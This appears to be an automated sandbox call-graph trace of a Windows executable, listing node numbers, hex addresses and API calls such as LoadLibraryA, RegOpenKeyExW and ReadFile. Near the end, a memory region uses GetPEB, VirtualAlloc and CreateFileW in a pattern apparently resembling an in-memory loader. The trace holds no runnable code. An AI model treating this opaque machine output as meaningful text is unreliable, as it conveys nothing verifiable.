96608->96609 96610 f233dd 96608->96610 96611 f3fddb 22 API calls 96609->96611 96638 f233ee 96610->96638 96614 f630c5 _wcslen 96611->96614 96613 f233e8 96613->96578 96615 f3fe0b 22 API calls 96614->96615 96616 f630fe __fread_nolock 96615->96616 96617->96596 96619 f293c0 96618->96619 96621 f293c9 __fread_nolock 96618->96621 96620 f2aec9 22 API calls 96619->96620 96619->96621 96620->96621 96621->96591 96624 f26382 96622->96624 96629 f263b6 __fread_nolock 96622->96629 96623 f64a82 96626 f3fddb 22 API calls 96623->96626 96624->96623 96625 f263a9 96624->96625 96624->96629 96633 f2a587 96625->96633 96628 f64a91 96626->96628 96630 f3fe0b 22 API calls 96628->96630 96629->96605 96631 f64ac5 __fread_nolock 96630->96631 96632->96604 96634 f2a59d 96633->96634 96637 f2a598 __fread_nolock 96633->96637 96635 f3fe0b 22 API calls 96634->96635 96636 f6f80f 96634->96636 96635->96637 96637->96629 96639 f233fe _wcslen 96638->96639 96640 f23411 96639->96640 96641 f6311d 96639->96641 96642 f2a587 22 API calls 96640->96642 96643 f3fddb 22 API calls 96641->96643 96644 f2341e __fread_nolock 96642->96644 96645 f63127 96643->96645 96644->96613 96646 f3fe0b 22 API calls 96645->96646 96647 f63157 __fread_nolock 96646->96647 96648 f22e37 96649 f2a961 22 API calls 96648->96649 96650 f22e4d 96649->96650 96727 f24ae3 96650->96727 96652 f22e6b 96741 f23a5a 96652->96741 96654 f22e7f 96748 f29cb3 96654->96748 96659 f62cb0 96792 f92cf9 96659->96792 96660 f22ead 96663 f2a8c7 22 API calls 96660->96663 96662 f62cc3 96664 f62ccf 96662->96664 96818 f24f39 96662->96818 96665 f22ec3 96663->96665 96668 f24f39 68 API calls 96664->96668 96776 f26f88 22 API calls 96665->96776 96670 f62ce5 96668->96670 96669 f22ecf 96671 f29cb3 22 API calls 96669->96671 96824 f23084 22 API calls 96670->96824 96672 f22edc 96671->96672 96777 f2a81b 41 API calls 96672->96777 96675 f22eec 96677 f29cb3 22 API calls 96675->96677 96676 f62d02 96825 f23084 22 API calls 96676->96825 96679 f22f12 96677->96679 96778 f2a81b 41 API calls 96679->96778 96680 f62d1e 96682 f23a5a 24 API calls 96680->96682 96684 f62d44 96682->96684 96683 f22f21 96687 f2a961 22 API calls 96683->96687 96826 f23084 22 API calls 96684->96826 96686 f62d50 96688 f2a8c7 22 API calls 96686->96688 96689 f22f3f 96687->96689 96690 f62d5e 96688->96690 96779 f23084 22 API calls 96689->96779 96827 f23084 22 API calls 96690->96827 96693 f22f4b 96780 f44a28 40 API calls 3 library calls 96693->96780 96694 f62d6d 96698 f2a8c7 22 API calls 96694->96698 96696 f22f59 96696->96670 96697 f22f63 96696->96697 96781 f44a28 40 API calls 3 library calls 96697->96781 96700 f62d83 96698->96700 96828 f23084 22 API calls 96700->96828 96701 f22f6e 96701->96676 96703 f22f78 96701->96703 96782 f44a28 40 API calls 3 library calls 96703->96782 96704 f62d90 96706 f22f83 96706->96680 96707 f22f8d 96706->96707 96783 f44a28 40 API calls 3 library calls 96707->96783 96709 f22f98 96710 f22fdc 96709->96710 96784 f23084 22 API calls 96709->96784 96710->96694 96711 f22fe8 96710->96711 96711->96704 96786 f263eb 22 API calls 96711->96786 96713 f22fbf 96716 f2a8c7 22 API calls 96713->96716 96715 f22ff8 96787 f26a50 22 API calls 96715->96787 96718 f22fcd 96716->96718 96785 f23084 22 API calls 96718->96785 96719 f23006 96788 f270b0 23 API calls 96719->96788 96724 f23021 96725 f23065 96724->96725 96789 f26f88 22 API calls 96724->96789 96790 f270b0 23 API calls 96724->96790 96791 f23084 22 API calls 96724->96791 96728 f24af0 __wsopen_s 96727->96728 96729 f26b57 22 API calls 96728->96729 96730 f24b22 96728->96730 96729->96730 96736 f24b58 96730->96736 96829 f24c6d 96730->96829 96732 f24c29 96733 f29cb3 22 API calls 96732->96733 96740 f24c5e 96732->96740 96735 f24c52 96733->96735 96734 f29cb3 22 API calls 96734->96736 96737 f2515f 22 API calls 96735->96737 96736->96732 96736->96734 96738 f24c6d 22 API calls 96736->96738 96832 f2515f 96736->96832 96737->96740 96738->96736 96740->96652 96838 f61f50 96741->96838 96744 f29cb3 22 API calls 96745 f23a8d 96744->96745 96840 f23aa2 96745->96840 96747 f23a97 96747->96654 96749 f29cc2 _wcslen 96748->96749 96750 f3fe0b 22 API calls 96749->96750 96751 f29cea __fread_nolock 96750->96751 96752 f3fddb 22 API calls 96751->96752 96753 f22e8c 96752->96753 96754 f24ecb 96753->96754 96860 f24e90 LoadLibraryA 96754->96860 96759 f24ef6 LoadLibraryExW 96868 f24e59 LoadLibraryA 96759->96868 96760 f63ccf 96761 f24f39 68 API calls 96760->96761 96764 f63cd6 96761->96764 96766 f24e59 3 API calls 96764->96766 96768 f63cde 96766->96768 96767 f24f20 96767->96768 96769 f24f2c 96767->96769 96890 f250f5 96768->96890 96770 f24f39 68 API calls 96769->96770 96772 f22ea5 96770->96772 96772->96659 96772->96660 96775 f63d05 96776->96669 96777->96675 96778->96683 96779->96693 96780->96696 96781->96701 96782->96706 96783->96709 96784->96713 96785->96710 96786->96715 96787->96719 96788->96724 96789->96724 96790->96724 96791->96724 96793 f92d15 96792->96793 96794 f2511f 64 API calls 96793->96794 96795 f92d29 96794->96795 97161 f92e66 96795->97161 96798 f250f5 40 API calls 96799 f92d56 96798->96799 96800 f250f5 40 API calls 96799->96800 96801 f92d66 96800->96801 96802 f250f5 40 API calls 96801->96802 96803 f92d81 96802->96803 96804 f250f5 40 API calls 96803->96804 96805 f92d9c 96804->96805 96806 f2511f 64 API calls 96805->96806 96807 f92db3 96806->96807 96808 f4ea0c ___std_exception_copy 21 API calls 96807->96808 96809 f92dba 96808->96809 96810 f4ea0c ___std_exception_copy 21 API calls 96809->96810 96811 f92dc4 96810->96811 96812 f250f5 40 API calls 96811->96812 96813 f92dd8 96812->96813 96814 f928fe 27 API calls 96813->96814 96816 f92dee 96814->96816 96815 f92d3f 96815->96662 96816->96815 97167 f922ce 96816->97167 96819 f24f43 96818->96819 96820 f24f4a 96818->96820 96821 f4e678 67 API calls 96819->96821 96822 f24f6a FreeLibrary 96820->96822 96823 f24f59 96820->96823 96821->96820 96822->96823 96823->96664 96824->96676 96825->96680 96826->96686 96827->96694 96828->96704 96830 f2aec9 22 API calls 96829->96830 96831 f24c78 96830->96831 96831->96730 96833 f2516e 96832->96833 96837 f2518f __fread_nolock 96832->96837 96835 f3fe0b 22 API calls 96833->96835 96834 f3fddb 22 API calls 96836 f251a2 96834->96836 96835->96837 96836->96736 96837->96834 96839 f23a67 GetModuleFileNameW 96838->96839 96839->96744 96841 f61f50 __wsopen_s 96840->96841 96842 f23aaf GetFullPathNameW 96841->96842 96843 f23ae9 96842->96843 96844 f23ace 96842->96844 96854 f2a6c3 96843->96854 96846 f26b57 22 API calls 96844->96846 96847 f23ada 96846->96847 96850 f237a0 96847->96850 96851 f237ae 96850->96851 96852 f293b2 22 API calls 96851->96852 96853 f237c2 96852->96853 96853->96747 96855 f2a6d0 96854->96855 96856 f2a6dd 96854->96856 96855->96847 96857 f3fddb 22 API calls 96856->96857 96858 f2a6e7 96857->96858 96859 f3fe0b 22 API calls 96858->96859 96859->96855 96861 f24ec6 96860->96861 96862 f24ea8 GetProcAddress 96860->96862 96865 f4e5eb 96861->96865 96863 f24eb8 96862->96863 96863->96861 96864 f24ebf FreeLibrary 96863->96864 96864->96861 96898 f4e52a 96865->96898 96867 f24eea 96867->96759 96867->96760 96869 f24e6e GetProcAddress 96868->96869 96870 f24e8d 96868->96870 96871 f24e7e 96869->96871 96873 f24f80 96870->96873 96871->96870 96872 f24e86 FreeLibrary 96871->96872 96872->96870 96874 f3fe0b 22 API calls 96873->96874 96875 f24f95 96874->96875 96966 f25722 96875->96966 96877 f24fa1 __fread_nolock 96878 f250a5 96877->96878 96879 f63d1d 96877->96879 96889 f24fdc 96877->96889 96969 f242a2 CreateStreamOnHGlobal 96878->96969 96980 f9304d 74 API calls 96879->96980 96882 f250f5 40 API calls 96882->96889 96883 f63d22 96884 f2511f 64 API calls 96883->96884 96885 f63d45 96884->96885 96886 f250f5 40 API calls 96885->96886 96888 f2506e messages 96886->96888 96888->96767 96889->96882 96889->96883 96889->96888 96975 f2511f 96889->96975 96891 f25107 96890->96891 96892 f63d70 96890->96892 97002 f4e8c4 96891->97002 96895 f928fe 97144 f9274e 96895->97144 96897 f92919 96897->96775 96901 f4e536 ___scrt_is_nonwritable_in_current_image 96898->96901 96899 f4e544 96923 f4f2d9 20 API calls _abort 96899->96923 96901->96899 96903 f4e574 96901->96903 96902 f4e549 96924 f527ec 26 API calls _abort 96902->96924 96905 f4e586 96903->96905 96906 f4e579 96903->96906 96915 f58061 96905->96915 96925 f4f2d9 20 API calls _abort 96906->96925 96909 f4e58f 96910 f4e595 96909->96910 96911 f4e5a2 96909->96911 96926 f4f2d9 20 API calls _abort 96910->96926 96927 f4e5d4 LeaveCriticalSection __fread_nolock 96911->96927 96914 f4e554 __fread_nolock 96914->96867 96916 f5806d ___scrt_is_nonwritable_in_current_image 96915->96916 96928 f52f5e EnterCriticalSection 96916->96928 96918 f5807b 96929 f580fb 96918->96929 96922 f580ac __fread_nolock 96922->96909 96923->96902 96924->96914 96925->96914 96926->96914 96927->96914 96928->96918 96935 f5811e 96929->96935 96930 f58088 96942 f580b7 96930->96942 96931 f58177 96947 f54c7d 96931->96947 96935->96930 96935->96931 96945 f4918d EnterCriticalSection 96935->96945 96946 f491a1 LeaveCriticalSection 96935->96946 96937 f58189 96937->96930 96960 f53405 11 API calls 2 library calls 96937->96960 96939 f581a8 96961 f4918d EnterCriticalSection 96939->96961 96965 f52fa6 LeaveCriticalSection 96942->96965 96944 f580be 96944->96922 96945->96935 96946->96935 96952 f54c8a _abort 96947->96952 96948 f54cca 96963 f4f2d9 20 API calls _abort 96948->96963 96949 f54cb5 RtlAllocateHeap 96951 f54cc8 96949->96951 96949->96952 96954 f529c8 96951->96954 96952->96948 96952->96949 96962 f44ead 7 API calls 2 library calls 96952->96962 96955 f529d3 RtlFreeHeap 96954->96955 96959 f529fc _free 96954->96959 96956 f529e8 96955->96956 96955->96959 96964 f4f2d9 20 API calls _abort 96956->96964 96958 f529ee GetLastError 96958->96959 96959->96937 96960->96939 96961->96930 96962->96952 96963->96951 96964->96958 96965->96944 96967 f3fddb 22 API calls 96966->96967 96968 f25734 96967->96968 96968->96877 96970 f242bc FindResourceExW 96969->96970 96974 f242d9 96969->96974 96971 f635ba LoadResource 96970->96971 96970->96974 96972 f635cf SizeofResource 96971->96972 96971->96974 96973 f635e3 LockResource 96972->96973 96972->96974 96973->96974 96974->96889 96976 f63d90 96975->96976 96977 f2512e 96975->96977 96981 f4ece3 96977->96981 96980->96883 96984 f4eaaa 96981->96984 96983 f2513c 96983->96889 96987 f4eab6 ___scrt_is_nonwritable_in_current_image 96984->96987 96985 f4eac2 96997 f4f2d9 20 API calls _abort 96985->96997 96987->96985 96988 f4eae8 96987->96988 96999 f4918d EnterCriticalSection 96988->96999 96989 f4eac7 96998 f527ec 26 API calls _abort 96989->96998 96992 f4eaf4 97000 f4ec0a 62 API calls 2 library calls 96992->97000 96994 f4eb08 97001 f4eb27 LeaveCriticalSection __fread_nolock 96994->97001 96996 f4ead2 __fread_nolock 96996->96983 96997->96989 96998->96996 96999->96992 97000->96994 97001->96996 97005 f4e8e1 97002->97005 97004 f25118 97004->96895 97006 f4e8ed ___scrt_is_nonwritable_in_current_image 97005->97006 97007 f4e900 ___scrt_fastfail 97006->97007 97008 f4e92d 97006->97008 97009 f4e925 __fread_nolock 97006->97009 97032 f4f2d9 20 API calls _abort 97007->97032 97018 f4918d EnterCriticalSection 97008->97018 97009->97004 97011 f4e937 97019 f4e6f8 97011->97019 97014 f4e91a 97033 f527ec 26 API calls _abort 97014->97033 97018->97011 97022 f4e70a ___scrt_fastfail 97019->97022 97025 f4e727 97019->97025 97020 f4e717 97107 f4f2d9 20 API calls _abort 97020->97107 97022->97020 97022->97025 97027 f4e76a __fread_nolock 97022->97027 97023 f4e71c 97108 f527ec 26 API calls _abort 97023->97108 97034 f4e96c LeaveCriticalSection __fread_nolock 97025->97034 97026 f4e886 ___scrt_fastfail 97110 f4f2d9 20 API calls _abort 97026->97110 97027->97025 97027->97026 97035 f4d955 97027->97035 97042 f58d45 97027->97042 97109 f4cf78 26 API calls 4 library calls 97027->97109 97032->97014 97033->97009 97034->97009 97036 f4d976 97035->97036 97037 f4d961 97035->97037 97036->97027 97111 f4f2d9 20 API calls _abort 97037->97111 97039 f4d966 97112 f527ec 26 API calls _abort 97039->97112 97041 f4d971 97041->97027 97043 f58d57 97042->97043 97044 f58d6f 97042->97044 97122 f4f2c6 20 API calls _abort 97043->97122 97046 f590d9 97044->97046 97051 f58db4 97044->97051 97138 f4f2c6 20 API calls _abort 97046->97138 97047 f58d5c 97123 f4f2d9 20 API calls _abort 97047->97123 97050 f590de 97139 f4f2d9 20 API calls _abort 97050->97139 97052 f58dbf 97051->97052 97055 f58d64 97051->97055 97059 f58def 97051->97059 97124 f4f2c6 20 API calls _abort 97052->97124 97055->97027 97056 f58dcc 97140 f527ec 26 API calls _abort 97056->97140 97057 f58dc4 97125 f4f2d9 20 API calls _abort 97057->97125 97061 f58e08 97059->97061 97062 f58e2e 97059->97062 97063 f58e4a 97059->97063 97061->97062 97069 f58e15 97061->97069 97126 f4f2c6 20 API calls _abort 97062->97126 97129 f53820 21 API calls 2 library calls 97063->97129 97066 f58e33 97127 f4f2d9 20 API calls _abort 97066->97127 97113 f5f89b 97069->97113 97070 f58e61 97073 f529c8 _free 20 API calls 97070->97073 97071 f58fb3 97074 f59029 97071->97074 97078 f58fcc GetConsoleMode 97071->97078 97072 f58e3a 97128 f527ec 26 API calls _abort 97072->97128 97076 f58e6a 97073->97076 97077 f5902d ReadFile 97074->97077 97079 f529c8 _free 20 API calls 97076->97079 97080 f59047 97077->97080 97081 f590a1 GetLastError 97077->97081 97078->97074 97082 f58fdd 97078->97082 97083 f58e71 97079->97083 97080->97081 97086 f5901e 97080->97086 97084 f59005 97081->97084 97085 f590ae 97081->97085 97082->97077 97087 f58fe3 ReadConsoleW 97082->97087 97088 f58e96 97083->97088 97089 f58e7b 97083->97089 97104 f58e45 __fread_nolock 97084->97104 97133 f4f2a3 20 API calls 2 library calls 97084->97133 97136 f4f2d9 20 API calls _abort 97085->97136 97100 f59083 97086->97100 97101 f5906c 97086->97101 97086->97104 97087->97086 97092 f58fff GetLastError 97087->97092 97132 f59424 28 API calls __fread_nolock 97088->97132 97130 f4f2d9 20 API calls _abort 97089->97130 97092->97084 97093 f529c8 _free 20 API calls 97093->97055 97095 f590b3 97137 f4f2c6 20 API calls _abort 97095->97137 97097 f58e80 97131 f4f2c6 20 API calls _abort 97097->97131 97103 f5909a 97100->97103 97100->97104 97134 f58a61 31 API calls 3 library calls 97101->97134 97135 f588a1 29 API calls __fread_nolock 97103->97135 97104->97093 97106 f5909f 97106->97104 97107->97023 97108->97025 97109->97027 97110->97023 97111->97039 97112->97041 97114 f5f8b5 97113->97114 97115 f5f8a8 97113->97115 97117 f5f8c1 97114->97117 97142 f4f2d9 20 API calls _abort 97114->97142 97141 f4f2d9 20 API calls _abort 97115->97141 97117->97071 97119 f5f8ad 97119->97071 97120 f5f8e2 97143 f527ec 26 API calls _abort 97120->97143 97122->97047 97123->97055 97124->97057 97125->97056 97126->97066 97127->97072 97128->97104 97129->97070 97130->97097 97131->97104 97132->97069 97133->97104 97134->97104 97135->97106 97136->97095 97137->97104 97138->97050 97139->97056 97140->97055 97141->97119 97142->97120 97143->97119 97147 f4e4e8 97144->97147 97146 f9275d 97146->96897 97150 f4e469 97147->97150 97149 f4e505 97149->97146 97151 f4e48c 97150->97151 97152 f4e478 97150->97152 97157 f4e488 __alldvrm 97151->97157 97160 f5333f 11 API calls 2 library calls 97151->97160 97158 f4f2d9 20 API calls _abort 97152->97158 97154 f4e47d 97159 f527ec 26 API calls _abort 97154->97159 97157->97149 97158->97154 97159->97157 97160->97157 97166 f92e7a 97161->97166 97162 f92d3b 97162->96798 97162->96815 97163 f250f5 40 API calls 97163->97166 97164 f928fe 27 API calls 97164->97166 97165 f2511f 64 API calls 97165->97166 97166->97162 97166->97163 97166->97164 97166->97165 97168 f922d9 97167->97168 97169 f922e7 97167->97169 97170 f4e5eb 29 API calls 97168->97170 97171 f9232c 97169->97171 97172 f4e5eb 29 API calls 97169->97172 97181 f922f0 97169->97181 97170->97169 97196 f92557 97171->97196 97173 f92311 97172->97173 97173->97171 97175 f9231a 97173->97175 97179 f4e678 67 API calls 97175->97179 97175->97181 97176 f92370 97177 f92395 97176->97177 97178 f92374 97176->97178 97200 f92171 97177->97200 97183 f4e678 67 API calls 97178->97183 97184 f92381 97178->97184 97179->97181 97181->96815 97182 f9239d 97186 f923c3 97182->97186 97187 f923a3 97182->97187 97183->97184 97184->97181 97185 f4e678 67 API calls 97184->97185 97185->97181 97207 f923f3 97186->97207 97189 f923b0 97187->97189 97190 f4e678 67 API calls 97187->97190 97189->97181 97191 f4e678 67 API calls 97189->97191 97190->97189 97191->97181 97192 f923de 97192->97181 97195 f4e678 67 API calls 97192->97195 97193 f923ca 97193->97192 97215 f4e678 97193->97215 97195->97181 97197 f9257c 97196->97197 97199 f92565 __fread_nolock 97196->97199 97198 f4e8c4 __fread_nolock 40 API calls 97197->97198 97198->97199 97199->97176 97201 f4ea0c ___std_exception_copy 21 API calls 97200->97201 97202 f9217f 97201->97202 97203 f4ea0c ___std_exception_copy 21 API calls 97202->97203 97204 f92190 97203->97204 97205 f4ea0c ___std_exception_copy 21 API calls 97204->97205 97206 f9219c 97205->97206 97206->97182 97214 f92408 97207->97214 97208 f924c0 97232 f92724 97208->97232 97209 f921cc 40 API calls 97209->97214 97211 f924c7 97211->97193 97214->97208 97214->97209 97214->97211 97228 f92606 97214->97228 97236 f92269 40 API calls 97214->97236 97216 f4e684 ___scrt_is_nonwritable_in_current_image 97215->97216 97217 f4e695 97216->97217 97218 f4e6aa 97216->97218 97310 f4f2d9 20 API calls _abort 97217->97310 97220 f4e6a5 __fread_nolock 97218->97220 97293 f4918d EnterCriticalSection 97218->97293 97220->97192 97222 f4e69a 97311 f527ec 26 API calls _abort 97222->97311 97223 f4e6c6 97294 f4e602 97223->97294 97226 f4e6d1 97312 f4e6ee LeaveCriticalSection __fread_nolock 97226->97312 97229 f92617 97228->97229 97230 f9261d 97228->97230 97229->97230 97237 f926d7 97229->97237 97230->97214 97233 f92731 97232->97233 97235 f92742 97232->97235 97234 f4dbb3 65 API calls 97233->97234 97234->97235 97235->97211 97236->97214 97238 f92714 97237->97238 97239 f92703 97237->97239 97238->97229 97241 f4dbb3 97239->97241 97242 f4dbdd 97241->97242 97243 f4dbc1 97241->97243 97242->97238 97243->97242 97244 f4dbe3 97243->97244 97245 f4dbcd 97243->97245 97250 f4d9cc 97244->97250 97253 f4f2d9 20 API calls _abort 97245->97253 97248 f4dbd2 97254 f527ec 26 API calls _abort 97248->97254 97255 f4d97b 97250->97255 97252 f4d9f0 97252->97242 97253->97248 97254->97242 97256 f4d987 ___scrt_is_nonwritable_in_current_image 97255->97256 97263 f4918d EnterCriticalSection 97256->97263 97258 f4d995 97264 f4d9f4 97258->97264 97262 f4d9b3 __fread_nolock 97262->97252 97263->97258 97272 f549a1 97264->97272 97270 f4d9a2 97271 f4d9c0 LeaveCriticalSection __fread_nolock 97270->97271 97271->97262 97273 f4d955 __fread_nolock 26 API calls 97272->97273 97274 f549b0 97273->97274 97275 f5f89b __fread_nolock 26 API calls 97274->97275 97276 f549b6 97275->97276 97277 f4da09 97276->97277 97278 f53820 __fread_nolock 21 API calls 97276->97278 97281 f4da3a 97277->97281 97279 f54a15 97278->97279 97280 f529c8 _free 20 API calls 97279->97280 97280->97277 97282 f4da24 97281->97282 97285 f4da4c 97281->97285 97292 f54a56 62 API calls 97282->97292 97283 f4da5a 97284 f4f2d9 _free 20 API calls 97283->97284 97286 f4da5f 97284->97286 97285->97282 97285->97283 97290 f4da85 __fread_nolock 97285->97290 97287 f527ec _abort 26 API calls 97286->97287 97287->97282 97288 f4dc0b 62 API calls 97288->97290 97289 f4d955 __fread_nolock 26 API calls 97289->97290 97290->97282 97290->97288 97290->97289 97291 f559be __wsopen_s 62 API calls 97290->97291 97291->97290 97292->97270 97293->97223 97295 f4e624 97294->97295 97296 f4e60f 97294->97296 97302 f4e61f 97295->97302 97313 f4dc0b 97295->97313 97338 f4f2d9 20 API calls _abort 97296->97338 97298 f4e614 97339 f527ec 26 API calls _abort 97298->97339 97302->97226 97305 f4d955 __fread_nolock 26 API calls 97306 f4e646 97305->97306 97323 f5862f 97306->97323 97309 f529c8 _free 20 API calls 97309->97302 97310->97222 97311->97220 97312->97220 97314 f4dc23 97313->97314 97318 f4dc1f 97313->97318 97315 f4d955 __fread_nolock 26 API calls 97314->97315 97314->97318 97316 f4dc43 97315->97316 97340 f559be 97316->97340 97319 f54d7a 97318->97319 97320 f4e640 97319->97320 97321 f54d90 97319->97321 97320->97305 97321->97320 97322 f529c8 _free 20 API calls 97321->97322 97322->97320 97324 f58653 97323->97324 97325 f5863e 97323->97325 97327 f5868e 97324->97327 97332 f5867a 97324->97332 97463 f4f2c6 20 API calls _abort 97325->97463 97465 f4f2c6 20 API calls _abort 97327->97465 97329 f58643 97464 f4f2d9 20 API calls _abort 97329->97464 97330 f58693 97466 f4f2d9 20 API calls _abort 97330->97466 97460 f58607 97332->97460 97335 f5869b 97467 f527ec 26 API calls _abort 97335->97467 97336 f4e64c 97336->97302 97336->97309 97338->97298 97339->97302 97341 f559ca ___scrt_is_nonwritable_in_current_image 97340->97341 97342 f559d2 97341->97342 97343 f559ea 97341->97343 97419 f4f2c6 20 API calls _abort 97342->97419 97345 f55a88 97343->97345 97349 f55a1f 97343->97349 97424 f4f2c6 20 API calls _abort 97345->97424 97346 f559d7 97420 f4f2d9 20 API calls _abort 97346->97420 97365 f55147 EnterCriticalSection 97349->97365 97350 f55a8d 97425 f4f2d9 20 API calls _abort 97350->97425 97353 f55a25 97355 f55a56 97353->97355 97356 f55a41 97353->97356 97354 f55a95 97426 f527ec 26 API calls _abort 97354->97426 97366 f55aa9 97355->97366 97421 f4f2d9 20 API calls _abort 97356->97421 97358 f559df __fread_nolock 97358->97318 97361 f55a51 97423 f55a80 LeaveCriticalSection __wsopen_s 97361->97423 97362 f55a46 97422 f4f2c6 20 API calls _abort 97362->97422 97365->97353 97367 f55ad7 97366->97367 97396 f55ad0 97366->97396 97368 f55adb 97367->97368 97369 f55afa 97367->97369 97434 f4f2c6 20 API calls _abort 97368->97434 97372 f55b2e 97369->97372 97373 f55b4b 97369->97373 97437 f4f2c6 20 API calls _abort 97372->97437 97378 f55b61 97373->97378 97440 f59424 28 API calls __fread_nolock 97373->97440 97374 f55cb1 97374->97361 97375 f55ae0 97435 f4f2d9 20 API calls _abort 97375->97435 97427 f5564e 97378->97427 97379 f55b33 97438 f4f2d9 20 API calls _abort 97379->97438 97380 f55ae7 97436 f527ec 26 API calls _abort 97380->97436 97386 f55b3b 97439 f527ec 26 API calls _abort 97386->97439 97387 f55b6f 97389 f55b95 97387->97389 97390 f55b73 97387->97390 97388 f55ba8 97392 f55c02 WriteFile 97388->97392 97393 f55bbc 97388->97393 97442 f5542e 45 API calls 3 library calls 97389->97442 97394 f55c69 97390->97394 97397 f55c25 GetLastError 97392->97397 97402 f55b8b 97392->97402 97398 f55bc4 97393->97398 97399 f55bf2 97393->97399 97394->97396 97451 f40a8c 97396->97451 97397->97402 97402->97394 97402->97396 97419->97346 97420->97358 97421->97362 97422->97361 97423->97358 97424->97350 97425->97354 97426->97358 97428 f5f89b __fread_nolock 26 API calls 97427->97428 97429 f5565e 97428->97429 97431 f55663 97429->97431 97458 f52d74 38 API calls 2 library calls 97429->97458 97431->97387 97431->97388 97432 f55686 97432->97431 97433 f556a4 GetConsoleMode 97432->97433 97433->97431 97434->97375 97435->97380 97436->97396 97437->97379 97438->97386 97439->97396 97440->97378 97442->97402 97452 f40a95 97451->97452 97453 f40a97 IsProcessorFeaturePresent 97451->97453 97452->97374 97455 f40c5d 97453->97455 97459 f40c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97455->97459 97457 f40d40 97457->97374 97458->97432 97459->97457 97468 f58585 97460->97468 97462 f5862b 97462->97336 97463->97329 97464->97336 97465->97330 97466->97335 97467->97336 97469 f58591 ___scrt_is_nonwritable_in_current_image 97468->97469 97479 f55147 EnterCriticalSection 97469->97479 97471 f5859f 97472 f585c6 97471->97472 97473 f585d1 97471->97473 97480 f586ae 97472->97480 97495 f4f2d9 20 API calls _abort 97473->97495 97476 f585cc 97496 f585fb LeaveCriticalSection __wsopen_s 97476->97496 97478 f585ee __fread_nolock 97478->97462 97479->97471 97497 f553c4 97480->97497 97482 f586c4 97510 f55333 21 API calls 3 library calls 97482->97510 97484 f586be 97484->97482 97485 f553c4 __wsopen_s 26 API calls 97484->97485 97494 f586f6 97484->97494 97488 f586ed 97485->97488 97486 f553c4 __wsopen_s 26 API calls 97489 f58702 FindCloseChangeNotification 97486->97489 97487 f5871c 97492 f553c4 __wsopen_s 26 API calls 97488->97492 97489->97482 97492->97494 97494->97482 97494->97486 97495->97476 97496->97478 97498 f553e6 97497->97498 97499 f553d1 97497->97499 97505 f5540b 97498->97505 97514 f4f2c6 20 API calls _abort 97498->97514 97512 f4f2c6 20 API calls _abort 97499->97512 97502 f553d6 97513 f4f2d9 20 API calls _abort 97502->97513 97503 f55416 97515 f4f2d9 20 API calls _abort 97503->97515 97505->97484 97507 f5541e 97516 f527ec 26 API calls _abort 97507->97516 97508 f553de 97508->97484 97510->97487 97512->97502 97513->97508 97514->97503 97515->97507 97516->97508 97517 11623b0 97531 1160000 97517->97531 97519 116245b 97534 11622a0 97519->97534 97537 1163480 GetPEB 97531->97537 97533 116068b 97533->97519 97535 11622a9 Sleep 97534->97535 97536 11622b7 97535->97536 97538 11634aa 97537->97538 97538->97533 97539 f2105b 97544 f2344d 97539->97544 97541 f2106a 97575 f400a3 29 API calls __onexit 97541->97575 97543 f21074 97545 f2345d __wsopen_s 97544->97545 97546 f2a961 22 API calls 97545->97546 97547 f23513 97546->97547 97548 f23a5a 24 API calls 97547->97548 97549 f2351c 97548->97549 97576 f23357 97549->97576 97552 f233c6 22 API calls 97553 f23535 97552->97553 97554 f2515f 22 API calls 97553->97554 97555 f23544 97554->97555 97556 f2a961 22 API calls 97555->97556 97557 f2354d 97556->97557 97558 f2a6c3 22 API calls 97557->97558 97559 f23556 RegOpenKeyExW 97558->97559 97560 f63176 RegQueryValueExW 97559->97560 97565 f23578 97559->97565 97561 f63193 97560->97561 97562 f6320c RegCloseKey 97560->97562 97563 f3fe0b 22 API calls 97561->97563 97562->97565 97574 f6321e _wcslen 97562->97574 97564 f631ac 97563->97564 97567 f25722 22 API calls 97564->97567 97565->97541 97566 f24c6d 22 API calls 97566->97574 97568 f631b7 RegQueryValueExW 97567->97568 97569 f631d4 97568->97569 97571 f631ee messages 97568->97571 97570 f26b57 22 API calls 97569->97570 97570->97571 97571->97562 97572 f29cb3 22 API calls 97572->97574 97573 f2515f 22 API calls 97573->97574 97574->97565 97574->97566 97574->97572 97574->97573 97575->97543 97577 f61f50 __wsopen_s 97576->97577 97578 f23364 GetFullPathNameW 97577->97578 97579 f23386 97578->97579 97580 f26b57 22 API calls 97579->97580 97581 f233a4 97580->97581 97581->97552 97582 f21098 97587 f242de 97582->97587 97586 f210a7 97588 f2a961 22 API calls 97587->97588 97589 f242f5 GetVersionExW 97588->97589 97590 f26b57 22 API calls 97589->97590 97591 f24342 97590->97591 97592 f293b2 22 API calls 97591->97592 97604 f24378 97591->97604 97593 f2436c 97592->97593 97595 f237a0 22 API calls 97593->97595 97594 f2441b GetCurrentProcess IsWow64Process 97596 f24437 97594->97596 97595->97604 97597 f63824 GetSystemInfo 97596->97597 97598 f2444f LoadLibraryA 97596->97598 97599 f24460 GetProcAddress 97598->97599 97600 f2449c GetSystemInfo 97598->97600 97599->97600 97602 f24470 GetNativeSystemInfo 97599->97602 97603 f24476 97600->97603 97601 f637df 97602->97603 97605 f2109d 97603->97605 97606 f2447a FreeLibrary 97603->97606 97604->97594 97604->97601 97607 f400a3 29 API calls __onexit 97605->97607 97606->97605 97607->97586 97608 116295b 97611 11625d0 97608->97611 97610 11629a7 97612 1160000 GetPEB 97611->97612 97621 116266f 97612->97621 97614 11626a0 CreateFileW 97617 11626ad 97614->97617 97614->97621 97615 11626c9 VirtualAlloc 97616 11626ea ReadFile 97615->97616 97615->97617 97616->97617 97620 1162708 VirtualAlloc 97616->97620 97618 11628bc VirtualFree 97617->97618 97619 11628ca 97617->97619 97618->97619 97619->97610 97620->97617 97620->97621 97621->97615 97621->97617 97622 11627d0 FindCloseChangeNotification 97621->97622 97623 11627e0 VirtualFree 97621->97623 97624 11634e0 GetPEB 97621->97624 97622->97621 97623->97621 97625 116350a 97624->97625 97625->97614 97626 f2f7bf 97627 f2f7d3 97626->97627 97628 f2fcb6 97626->97628 97630 f2fcc2 97627->97630 97631 f3fddb 22 API calls 97627->97631 97715 f2aceb 23 API calls messages 97628->97715 97716 f2aceb 23 API calls messages 97630->97716 97633 f2f7e5 97631->97633 97633->97630 97634 f2f83e 97633->97634 97635 f2fd3d 97633->97635 97652 f2ed9d messages 97634->97652 97661 f31310 97634->97661 97717 f91155 22 API calls 97635->97717 97638 f2fef7 97645 f2a8c7 22 API calls 97638->97645 97638->97652 97639 f306a0 41 API calls 97658 f2ec76 messages 97639->97658 97641 f74b0b 97719 f9359c 82 API calls __wsopen_s 